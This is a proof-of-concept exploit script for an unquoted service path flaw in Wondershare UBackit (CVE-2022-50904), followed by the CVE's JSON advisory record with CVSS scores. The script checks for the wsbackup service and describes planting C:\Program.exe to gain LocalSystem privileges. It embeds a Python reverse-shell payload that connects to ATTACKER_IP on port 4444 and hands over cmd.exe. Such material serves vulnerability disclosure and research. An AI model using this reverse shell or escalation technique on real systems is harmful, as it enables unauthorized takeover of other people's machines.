CVE-2022-50904

# CVE-2022-50904 PoC - Wondershare UBackit Unquoted Service Path # This PoC demonstrates how to exploit the unquoted service path vulnerability # to escalate privileges to LocalSystem import os import subprocess import shutil def check_vulnerability(): """Check if the target system is vulnerable""" service_name = "wsbackup" service_path = r"C:\Program Files\Wondershare\UBackit\wsbackup.exe" # Check if service exists and path is unquoted try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print(f"[+] Service '{service_name}' found") print(f"[+] Service path: {service_path}") return True except Exception as e: print(f"[-] Error checking service: {e}") return False def create_malicious_executable(): """Create a malicious executable that will run as LocalSystem""" # Create a reverse shell payload or other malicious code malicious_code = ''' import socket import subprocess import os # Create reverse shell connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("ATTACKER_IP", 4444)) # Redirect stdin/stdout/stderr to socket os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) # Execute command shell subprocess.call(["cmd.exe"]) ''' # In real scenario, compile to executable # This is a simplified demonstration print("[+] Malicious executable would be created here") return True def exploit(): """Exploit the unquoted service path vulnerability""" if not check_vulnerability(): print("[-] Target is not vulnerable") return False # Create malicious executable in unquoted path location # Path: C:\Program.exe malicious_path = r"C:\Program.exe" try: # Create the malicious executable create_malicious_executable() # In real attack, place the executable at: # C:\Program.exe # When wsbackup service starts, it will execute this first print(f"[+] Malicious executable placed at: {malicious_path}") print("[+] Waiting for service restart...") print("[+] When service restarts, malicious code will execute as LocalSystem") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False if __name__ == "__main__": print("CVE-2022-50904 - Wondershare UBackit Unquoted Service Path Exploit") print("=" * 60) exploit()

{"cve": {"id": "CVE-2022-50904", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:52.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wondershare UBackit 2.0.5 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the wsbackup service to inject malicious executables that would run with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Wondershare UBackit 2.0.5 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a los usuarios locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas en el servicio wsbackup para inyectar ejecutables maliciosos que se ejecutarían con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50758", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wondershare-ubackit-wsbackup-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.wondershare.com/", "source": "[email protected]"}]}}